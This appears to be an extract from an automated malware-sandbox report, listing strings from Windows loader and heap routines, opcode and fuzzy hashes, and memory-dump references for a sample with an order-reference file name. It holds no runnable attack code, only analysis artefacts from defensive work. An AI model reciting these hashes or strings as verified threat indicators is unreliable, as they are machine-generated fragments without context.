                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                            • API String ID: 0-617086771
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-4253913091
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $@
                                                                                            • API String ID: 0-1077428164
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                            • API String ID: 0-2779062949
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0196A121
                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0196A10F
                                                                                            • LdrpCheckModule, xrefs: 0196A117
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-161242083
                                                                                            Strings
                                                                                            • Failed to reallocate the system dirs string !, xrefs: 019782D7
                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 019782DE
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 019782E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1783798831
                                                                                            Strings
                                                                                            • PreferredUILanguages, xrefs: 019BC212
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019BC1C5
                                                                                            • @, xrefs: 019BC1F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                            • API String ID: 0-2968386058
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                            • API String ID: 0-1373925480
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01984899
                                                                                            • LdrpCheckRedirection, xrefs: 0198488F
                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01984888
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-3154609507
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-2558761708
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01982104
                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 019820F3
                                                                                            • LdrpInitializationFailure, xrefs: 019820FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2986994758
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: #%u
                                                                                            • API String ID: 48624451-232158463
                                                                                            Strings
                                                                                            • LdrResSearchResource Exit, xrefs: 0190AA25
                                                                                            • LdrResSearchResource Enter, xrefs: 0190AA13
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                            • API String ID: 0-4066393604
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$MUI
                                                                                            • API String ID: 0-17815947
                                                                                            Strings
                                                                                            • kLsE, xrefs: 01900540
                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0190063D
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                            • API String ID: 0-2547482624
                                                                                            Strings
                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0190A309
                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0190A2FB
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                            • API String ID: 0-2876891731
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                            • API String ID: 2994545307-4008356553
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MUI
                                                                                            • API String ID: 0-1339004836
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GlobalTags
                                                                                            • API String ID: 0-1106856819
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .mui
                                                                                            • API String ID: 0-1199573805
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: EXT-
                                                                                            • API String ID: 0-1948896318
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: BinaryHash
                                                                                            • API String ID: 0-2202222882
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-1885708031
                                                                                            Strings
                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0198895E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                            • API String ID: 0-702105204
                                                                                            • Opcode ID: a45bbaf4991db7fcab9770b41106c5252dfd1b0d624b460f016ecd140ce5c419
                                                                                            • Instruction ID: e73d0bc4c7482fe7568bd0a224110b32c04163a84d9ab55ccbe9868819a2c355
                                                                                            • Opcode Fuzzy Hash: a45bbaf4991db7fcab9770b41106c5252dfd1b0d624b460f016ecd140ce5c419
                                                                                            • Instruction Fuzzy Hash: 4701F23A304201BFF631BB59CC84EAA7FA9EFC1794B44052CF74D56152CB22AC41C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6f84e9d1169b8fd0138f11b6e5cbb9a2a472057e0a6e6045e84b9d7edc6925e
                                                                                            • Instruction ID: cfd77a8693702a7daeaf69a5f8ca63acbec6d7ee082f2f2fd1c9b0238dcc50f4
                                                                                            • Opcode Fuzzy Hash: d6f84e9d1169b8fd0138f11b6e5cbb9a2a472057e0a6e6045e84b9d7edc6925e
                                                                                            • Instruction Fuzzy Hash: D0915631A0061ADFEB26DB58C480B7DBBB9EF84B15F144469ED0D9B388E634DD81C761
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 025b0826c0af28672699ab4a428d9851b38ca92c48f286e147e2084a42bc0867
                                                                                            • Instruction ID: c8f0e6d8166308dd93146dcfe7014fd74a3a39ab1deec117f372ba6eeee287f9
                                                                                            • Opcode Fuzzy Hash: 025b0826c0af28672699ab4a428d9851b38ca92c48f286e147e2084a42bc0867
                                                                                            • Instruction Fuzzy Hash: 5B81B571E0061A9FDB59CF69D840ABEBBF9FB48700F44852EE949E7640E734D940CBA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction ID: 0a898fc328ac2f2477741709bc7f2a3357641453cd0a1252b0a79f3ae78b3718
                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction Fuzzy Hash: 90819431A0020A9FDF19CF99C880AAEBBF6FF84710F14856DD9599B344E734EA01CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57cdd53a04e44495d5fd56deecc54072bb51bf7b74947ed663dee3408d8e4f40
                                                                                            • Instruction ID: eca873c35ddac2b3ef29501c90d42a7de09c6bdbefb39c8dd5682a49789f44e1
                                                                                            • Opcode Fuzzy Hash: 57cdd53a04e44495d5fd56deecc54072bb51bf7b74947ed663dee3408d8e4f40
                                                                                            • Instruction Fuzzy Hash: 3B812F71A00609AFDB26DFA9C880FEEBBF9FF88354F144429E559A7250D730AD45CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 696b4373415308e7475aa6acee70ba612b91171dfa4fc4a25bb974ec6f44b102
                                                                                            • Instruction ID: 437e34bc5c373d591419143303466e83c295a16ea9f7a128a55ab5157114001f
                                                                                            • Opcode Fuzzy Hash: 696b4373415308e7475aa6acee70ba612b91171dfa4fc4a25bb974ec6f44b102
                                                                                            • Instruction Fuzzy Hash: F071E375D0462AEFCB25CF59D850BBEBBB8FF58710F14451AE94AAB354D370A840CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 19cf5c2658623c747d8376e484df1c3d3c012e9f6e7a7fe16feb3f2f4072ad66
                                                                                            • Instruction ID: eca65f0ac42511e3448b5356a383a5a27191fea4e2f3173c3bfc579a4a97049f
                                                                                            • Opcode Fuzzy Hash: 19cf5c2658623c747d8376e484df1c3d3c012e9f6e7a7fe16feb3f2f4072ad66
                                                                                            • Instruction Fuzzy Hash: EE716F70904305EFDB20DFA9DA84EDABBF8FF91701F10415EE619AB29AC7319940DB54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 69f98eee1adfdb5f79ef469766f5beae87b31718a6a79c6f9ef2eb3fece61499
                                                                                            • Instruction ID: 266faf4b5ce326ab72e3729ef1f304bb3c497df7eff67d4514be907e1953aad5
                                                                                            • Opcode Fuzzy Hash: 69f98eee1adfdb5f79ef469766f5beae87b31718a6a79c6f9ef2eb3fece61499
                                                                                            • Instruction Fuzzy Hash: 8371D4356042458FD312EF2CC480B6AB7E9FF84350F1489AAE85DCB399DB34E985CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction ID: dff7002444ce4ce23b90d11932a0000ec527484b8d01039e8e5d2923cee1bd89
                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction Fuzzy Hash: 8B716E71E00619AFDB10EFA9C944E9EBBB9FF88710F144569E509E7250DB30EA45CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0eabf6909a30dec7647e4bc3084a847050b85a5a66238b9ebee88a6f33e41bed
                                                                                            • Instruction ID: c518279f966d2259e6c7787a71ab7699c5b15c5de3006514fba9fb41a4fa9fbd
                                                                                            • Opcode Fuzzy Hash: 0eabf6909a30dec7647e4bc3084a847050b85a5a66238b9ebee88a6f33e41bed
                                                                                            • Instruction Fuzzy Hash: 0071E432200B01AFEB32CF5CC845F5ABBBAFB80B61F154918E65A872A0D775E944CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 222aee9bce5b5fb0b89cd944219411dc4fe9a547d95a1e4b564890d1da4bb530
                                                                                            • Instruction ID: ff2896cb67e3547929f9aefa05bc092260ff4b3da35eb0db003db09cd0128493
                                                                                            • Opcode Fuzzy Hash: 222aee9bce5b5fb0b89cd944219411dc4fe9a547d95a1e4b564890d1da4bb530
                                                                                            • Instruction Fuzzy Hash: A381CF72A08706DFDB29CF98D584BAEB7B9BF88711F15412DD908AB285C7749D40CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c476ac4b601ab654d1ad2aa0d5a0ced3f84258aca8aba112b0825f2a9923613e
                                                                                            • Instruction ID: 6748cdad083caca2447efb056cb3d8645dba6b33885a59212f431e825e0cb7f9
                                                                                            • Opcode Fuzzy Hash: c476ac4b601ab654d1ad2aa0d5a0ced3f84258aca8aba112b0825f2a9923613e
                                                                                            • Instruction Fuzzy Hash: 00711B71E0020AAFDF16DF94C881FEEBBB8FB44750F108169F618A7291D774AA45CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f9cde558ffb9d6e260d22be3c1b9160427ff2bfde06e10ab4a57a31574633af9
                                                                                            • Instruction ID: 579f2f4979271ae5f3193a915caef3b0f38fe910c086e3cd27f8121bcc5f3ea9
                                                                                            • Opcode Fuzzy Hash: f9cde558ffb9d6e260d22be3c1b9160427ff2bfde06e10ab4a57a31574633af9
                                                                                            • Instruction Fuzzy Hash: 4451D072504716AFD311DEA8C984F9BBBE9EBC5B10F01092DBA48DB150D774ED04CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8e665682ea1232276ab64ed45e97e5f90cde00dc287b47c86d4a894a3227015e
                                                                                            • Instruction ID: 77a6d240cd68e752205f08df61d516bc5bfca0d96ddbdf29b789942311d06b41
                                                                                            • Opcode Fuzzy Hash: 8e665682ea1232276ab64ed45e97e5f90cde00dc287b47c86d4a894a3227015e
                                                                                            • Instruction Fuzzy Hash: DE51E370900705DFD720CF9AC884A6BFBF8BF94B11F504A1ED29A576A0C770A549CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51e3c4b5e9b62dfa279a1cabe69356a0b49d8fc86ca70537ccfd64f44a87ef88
                                                                                            • Instruction ID: 438e1d54abc77fdc9b77d41ecbf0b1477f28bed16502dbde4243685c1a73c556
                                                                                            • Opcode Fuzzy Hash: 51e3c4b5e9b62dfa279a1cabe69356a0b49d8fc86ca70537ccfd64f44a87ef88
                                                                                            • Instruction Fuzzy Hash: E0517D71610A09DFCB22EF69C984E6AB3FDFF98754F400829E54A97260E730EE50CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 584f443c998164dfb6173a7f341c88ebcdc3750bb2c89c69869fd1f7264f0cbd
                                                                                            • Instruction ID: 9286e2acf2f2514e113b8e7b5efa44a03bf245c9394ea927ac6ee0e1ef7a89d7
                                                                                            • Opcode Fuzzy Hash: 584f443c998164dfb6173a7f341c88ebcdc3750bb2c89c69869fd1f7264f0cbd
                                                                                            • Instruction Fuzzy Hash: C1518C716083069FD754DF29C980A6BBBE9FFC8205F88492DF589C7250EB70D909CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction ID: f018592254a6425f504138aace9ce87650a87d5353a6ac5bf0f108bf9e58d1c4
                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction Fuzzy Hash: 19518D71E0022EABDF15DF98C440BEEBBB9AF45354F054069EA19EB244E774DE44CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction ID: 87034d71b5cf62a589641d9a65ba5063782009c058b37ffc173708fc5536fdaf
                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction Fuzzy Hash: AE51C831D0020AEFEF21FF95C8A4FAEBBB9AF40725F154665E51A67190D730DE4087A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d851c199e0b5e95f0df10a5b6fad4aace5e5481887da972cf5f465a9fd63e494
                                                                                            • Instruction ID: 073b67938771260bd7898186ca5944f2276e66198168e330bd4d36cd4c5c8f84
                                                                                            • Opcode Fuzzy Hash: d851c199e0b5e95f0df10a5b6fad4aace5e5481887da972cf5f465a9fd63e494
                                                                                            • Instruction Fuzzy Hash: 8D41E371A05A1ADFDB01DF58C8406ACB7B5BF46764F20832DDA16E7280D730EE818B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8649235fe5d404973a62669b336d739888978e22f15c37110a06b80a8d3bb634
                                                                                            • Instruction ID: b0ba7e16e08977c7273112965706df85f478353de9d26805fa123e1536334f36
                                                                                            • Opcode Fuzzy Hash: 8649235fe5d404973a62669b336d739888978e22f15c37110a06b80a8d3bb634
                                                                                            • Instruction Fuzzy Hash: 1041B3726047469FD320EF68C840A7AB7E9FFC8704F18461DF99997690E730E909C7A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7093ff639b7ac96700e50b9b99cc23ff753ee36ba6f2b9cd20794175c77b57a7
                                                                                            • Instruction ID: 37a3fe98bf8da9fcd06fb9018ba1dc175ac903865150a7adf08dbfa532f4f9c2
                                                                                            • Opcode Fuzzy Hash: 7093ff639b7ac96700e50b9b99cc23ff753ee36ba6f2b9cd20794175c77b57a7
                                                                                            • Instruction Fuzzy Hash: C741B2706043029FD726DF18D884B26BBE9EF80B51F14483DEA698B2E1D730D941CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e05d0a950c93165d70b60d310be7d952582db59367053eedd44e57cde2dd58de
                                                                                            • Instruction ID: b3125d538f74ceebd60a133387e053ff707d96eef1b14e74ae88e520f0bb5ad7
                                                                                            • Opcode Fuzzy Hash: e05d0a950c93165d70b60d310be7d952582db59367053eedd44e57cde2dd58de
                                                                                            • Instruction Fuzzy Hash: A4417171A01609CFCB55DF69C980A9DB7F1FF89324F24862ED66AE7290D734AA41CB40
